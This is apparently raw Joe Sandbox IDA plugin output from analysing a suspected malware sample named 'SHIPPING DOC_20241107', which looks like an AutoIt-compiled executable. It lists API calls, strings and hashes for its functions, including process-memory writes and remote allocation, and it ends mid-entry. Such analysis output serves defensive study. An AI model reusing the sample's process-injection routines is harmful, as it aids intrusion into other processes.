                                                                                                                              • Instruction ID: 1c2f8b612cf0df30b42edc0a8c5fb78904fc11ea9d9d4f14ee443a75d18358c4
                                                                                                                              • Opcode Fuzzy Hash: ec5e4224255277dbf438fa3501b62fe98e517ce2ba0c53222cab7b707af443b7
                                                                                                                              • Instruction Fuzzy Hash: 4A917C725083059FC714EF24D995EBEB7A8EFC5710F00891EF5869B2A1DA30EE44CB92
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009B48A1,?,?,009B37C0,?), ref: 009B48CE
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00A1BA47
                                                                                                                              • CoCreateInstance.OLE32(00A42D6C,00000000,00000001,00A42BDC,?), ref: 00A1BA60
                                                                                                                              • CoUninitialize.OLE32 ref: 00A1BA7D
                                                                                                                                • Part of subcall function 009B9997: __itow.LIBCMT ref: 009B99C2
                                                                                                                                • Part of subcall function 009B9997: __swprintf.LIBCMT ref: 009B9A0C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                              • String ID: .lnk
                                                                                                                              • API String ID: 2126378814-24824748
                                                                                                                              • Opcode ID: 2faaffddbd1c7648f9e0f45689bdaa2f3058f4944ecab337ef12a4d2c77f6b39
                                                                                                                              • Instruction ID: e833286cdd9b7bb53b9b3538657ffc037ed933ed2c9381b24d97407841a838b6
                                                                                                                              • Opcode Fuzzy Hash: 2faaffddbd1c7648f9e0f45689bdaa2f3058f4944ecab337ef12a4d2c77f6b39
                                                                                                                              • Instruction Fuzzy Hash: 74A169756143019FCB10DF14C984EAABBE5FF89324F148988F89A9B3A1CB31ED45CB91
                                                                                                                              APIs
                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 009D521D
                                                                                                                                • Part of subcall function 009E0270: __87except.LIBCMT ref: 009E02AB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHandling__87except__start
                                                                                                                              • String ID: pow
                                                                                                                              • API String ID: 2905807303-2276729525
                                                                                                                              • Opcode ID: f59252b9e60014ccc01cbaa25269d5e469625225c11ed2752e380493346c5cc2
                                                                                                                              • Instruction ID: e6cb2827b46ee5b2a486ec45a630b6a308d9b6efd7a22e5e052ef41da3f0635e
                                                                                                                              • Opcode Fuzzy Hash: f59252b9e60014ccc01cbaa25269d5e469625225c11ed2752e380493346c5cc2
                                                                                                                              • Instruction Fuzzy Hash: 2851BB60A4C641C7DB12E714C94137E2B98EBC0750F21CD5AE1E5823E9EFB48CCD9B42
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: #$+
                                                                                                                              • API String ID: 0-2552117581
                                                                                                                              • Opcode ID: a700f2dc83765786f19eb2e69d92ac0bc4023f8a87af3b6c7da63309bfba1b11
                                                                                                                              • Instruction ID: 2be59c69848516537dc5a566e5e871dccefe70f25d01badaaf564fcd94a823c3
                                                                                                                              • Opcode Fuzzy Hash: a700f2dc83765786f19eb2e69d92ac0bc4023f8a87af3b6c7da63309bfba1b11
                                                                                                                              • Instruction Fuzzy Hash: AF51323490524A9FDF24DF68D485BFABBA4EF96320F148055EC919B2E0E734AC42CB60
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$_memmove
                                                                                                                              • String ID: ERCP
                                                                                                                              • API String ID: 2532777613-1384759551
                                                                                                                              • Opcode ID: 5457fc1143fe7270441ba2e3f784fff28722ea9e06e6c60872efe94a74bd2613
                                                                                                                              • Instruction ID: 58e77ba8a33ed6d824e780ab749f01031f7a30f36760813b748861a578c812e8
                                                                                                                              • Opcode Fuzzy Hash: 5457fc1143fe7270441ba2e3f784fff28722ea9e06e6c60872efe94a74bd2613
                                                                                                                              • Instruction Fuzzy Hash: DE519271D00309DBDB24CF65C981BAAB7F8FF44314F20856EE54ACB291E775AA85CB41
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A117ED: WriteProcessMemory.KERNEL32 ref: 00A11817
                                                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A09B01
                                                                                                                                • Part of subcall function 00A117B8: ReadProcessMemory.KERNEL32 ref: 00A117E2
                                                                                                                                • Part of subcall function 00A1170F: GetWindowThreadProcessId.USER32(?,?), ref: 00A1173A
                                                                                                                                • Part of subcall function 00A1170F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A0951C,00000034,?,?,00001004,00000000,00000000), ref: 00A1174A
                                                                                                                                • Part of subcall function 00A1170F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A0951C,00000034,?,?,00001004,00000000,00000000), ref: 00A11760
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A09B6E
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A09BBB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 4150878124-2766056989
                                                                                                                              • Opcode ID: 9b9ae37b65168897fc73620db7d1fdb22b9b7b20aa5c3c47a240de9783304ed9
                                                                                                                              • Instruction ID: 1f63035ca3e8e8d0acb912ff9c40fd92b0feb205b5cfaf15f48591b6a7ced4b7
                                                                                                                              • Opcode Fuzzy Hash: 9b9ae37b65168897fc73620db7d1fdb22b9b7b20aa5c3c47a240de9783304ed9
                                                                                                                              • Instruction Fuzzy Hash: 9C415C7690121CAFDB10DBA4DD81EDEBBB8EB09310F104099FA55B7281DA706E85CF61
                                                                                                                              APIs
                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A37A11
                                                                                                                              • GetWindowLongW.USER32 ref: 00A37A2E
                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A37A3E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Long
                                                                                                                              • String ID: SysTreeView32
                                                                                                                              • API String ID: 847901565-1698111956
                                                                                                                              • Opcode ID: ad10dd1549dd6863b0de4d2e5cc2a721dcece256fb93550f2b4e39e28bf981e7
                                                                                                                              • Instruction ID: a51015d81b513c26f046a4eda45ab7255d3ad955ae66a3f5a518049aabe48ae4
                                                                                                                              • Opcode Fuzzy Hash: ad10dd1549dd6863b0de4d2e5cc2a721dcece256fb93550f2b4e39e28bf981e7
                                                                                                                              • Instruction Fuzzy Hash: FD31BC71614606AFDB218F78DC41BEA7BA9EB49374F204B25F875A22E0C730E9518B50
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A37493
                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A374A7
                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A374CB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window
                                                                                                                              • String ID: SysMonthCal32
                                                                                                                              • API String ID: 2326795674-1439706946
                                                                                                                              • Opcode ID: 3226399edfe4e67aef893f8abf2a220423687f6ecfc1bc24899db3f871b0b1ea
                                                                                                                              • Instruction ID: df5c128bbdbc9c781485a8cef97f38417d5f22641136ea285ece77dd219abf44
                                                                                                                              • Opcode Fuzzy Hash: 3226399edfe4e67aef893f8abf2a220423687f6ecfc1bc24899db3f871b0b1ea
                                                                                                                              • Instruction Fuzzy Hash: E4219F32510219BBDF218FA4DC42FEE3B79EF48724F150214FE546B191D6B5B891DBA0
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A37C7C
                                                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A37C8A
                                                                                                                              • DestroyWindow.USER32 ref: 00A37C91
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                                                              • String ID: msctls_updown32
                                                                                                                              • API String ID: 4014797782-2298589950
                                                                                                                              • Opcode ID: ac82795711309001bd5db1234d05234a24594c228f8c13f4faf222d7f4761a71
                                                                                                                              • Instruction ID: 4e8ca4d402d74f80a8a122ab0ca51fa450806ec143b2569c14f16e61d0495018
                                                                                                                              • Opcode Fuzzy Hash: ac82795711309001bd5db1234d05234a24594c228f8c13f4faf222d7f4761a71
                                                                                                                              • Instruction Fuzzy Hash: D9218EB5A00209AFDB10DF64DC81DAB37EDEF5A364F044459FA049B2A1CB71EC418BA0
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A36D6D
                                                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A36D7D
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A36DA2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$MoveWindow
                                                                                                                              • String ID: Listbox
                                                                                                                              • API String ID: 3315199576-2633736733
                                                                                                                              • Opcode ID: a55239f85eb04240cc42a0a533cab476fa4613994479ed235073a651aab8bd0b
                                                                                                                              • Instruction ID: 16dd481750f9de3c4af063d2b3f2e371e6ace968012747b3096f09448e012da8
                                                                                                                              • Opcode Fuzzy Hash: a55239f85eb04240cc42a0a533cab476fa4613994479ed235073a651aab8bd0b
                                                                                                                              • Instruction Fuzzy Hash: 84216F72610118BFEF158F54DC85FAB3BBAEF897A4F11C124FA059B1A0C671AC5297A0
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A377A4
                                                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A377B9
                                                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A377C6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID: msctls_trackbar32
                                                                                                                              • API String ID: 3850602802-1010561917
                                                                                                                              • Opcode ID: 09b0d4ff9d1a32c6ba39874adf36e582fd9f8ac31f9b20ccf9f2596faa78eaaf
                                                                                                                              • Instruction ID: 2ece9742e693ecc938fddff50e6395e7647d84cffc7a4562067f08b8bb89098e
                                                                                                                              • Opcode Fuzzy Hash: 09b0d4ff9d1a32c6ba39874adf36e582fd9f8ac31f9b20ccf9f2596faa78eaaf
                                                                                                                              • Instruction Fuzzy Hash: 2B11E372654208BEEF249F70DC45FEB7BADEF89B24F014518FA41A60E0D671A851DB20
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 009B4CA3
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,009B4C2E), ref: 009B4CB5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                              • API String ID: 2574300362-192647395
                                                                                                                              • Opcode ID: e3c4f5e095eabc66381b05637ff19d926b4ee22661c597fcdea73fbc60e52bd7
                                                                                                                              • Instruction ID: 78a04a1e1b0cc4605490d015f9e9313f8fa98c06c2838100f6bbcd1616bfd283
                                                                                                                              • Opcode Fuzzy Hash: e3c4f5e095eabc66381b05637ff19d926b4ee22661c597fcdea73fbc60e52bd7
                                                                                                                              • Instruction Fuzzy Hash: 2DD01270920727EFDB209F71DE18686B6D9AF05B51F11CC3AE8C5D6160D770D480C650
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 009B4DA2
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009B4DB4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                              • API String ID: 2574300362-1355242751
                                                                                                                              • Opcode ID: 5778694a915497e717c18fcc8c7620661c9d00c100bb0c39226d2b50c65d5689
                                                                                                                              • Instruction ID: 7e5668fa276374424d77c42d99dada9ed79d434c93126244c54b2add7e06b6d7
                                                                                                                              • Opcode Fuzzy Hash: 5778694a915497e717c18fcc8c7620661c9d00c100bb0c39226d2b50c65d5689
                                                                                                                              • Instruction Fuzzy Hash: 32D01770960713DFDB209F71ED08A86B6E8AF05365F118C3AE8C6DA1A0E770E880CA50
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 009B4D6F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,00A752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 009B4D81
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                              • API String ID: 2574300362-3689287502
                                                                                                                              • Opcode ID: 2c492e1fde8bb365fadf64ced37f02bb241ccc5b9cb733b20ce4e150a8ca9aba
                                                                                                                              • Instruction ID: b277f10da766df6c4b3cb51b0fd3836e54de4dae7172cb472196abba53b48620
                                                                                                                              • Opcode Fuzzy Hash: 2c492e1fde8bb365fadf64ced37f02bb241ccc5b9cb733b20ce4e150a8ca9aba
                                                                                                                              • Instruction Fuzzy Hash: A9D01770920713DFDB209F71ED08656B6E8BF15362F118E3AA486D62A0E670E880CA51
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A30E80
                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A30E92
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                              • API String ID: 2574300362-4033151799
                                                                                                                              • Opcode ID: 196aab59c4a926d435debc60705bcc83f1b1a16b72577bc4e71f5459c91c39cf
                                                                                                                              • Instruction ID: de5221f7c50ffb8edfbdf519240e8a510ba37a043fabb18b2f1b8c0f6faad39b
                                                                                                                              • Opcode Fuzzy Hash: 196aab59c4a926d435debc60705bcc83f1b1a16b72577bc4e71f5459c91c39cf
                                                                                                                              • Instruction Fuzzy Hash: 6FD01770A20723DFD7209F75DD28A8776E8AF05352F218C3AB58AD2160E674C880CA51
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00A29203
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW,?,00A3F910), ref: 00A29215
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                              • API String ID: 2574300362-199464113
                                                                                                                              • Opcode ID: ddc3821e6cc4f6da197245b91ad7afbc8e5b4d7ba099574fc228c7bdfae270fe
                                                                                                                              • Instruction ID: 383baa49bea46e7fb02fd5b232078af8b0e315e97cf2195df4d79f841001d323
                                                                                                                              • Opcode Fuzzy Hash: ddc3821e6cc4f6da197245b91ad7afbc8e5b4d7ba099574fc228c7bdfae270fe
                                                                                                                              • Instruction Fuzzy Hash: 99D0C7309A0323EFCB208F74EC08643B2E9AF01741F008C3AA882C21A0EBB0C880CB50
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
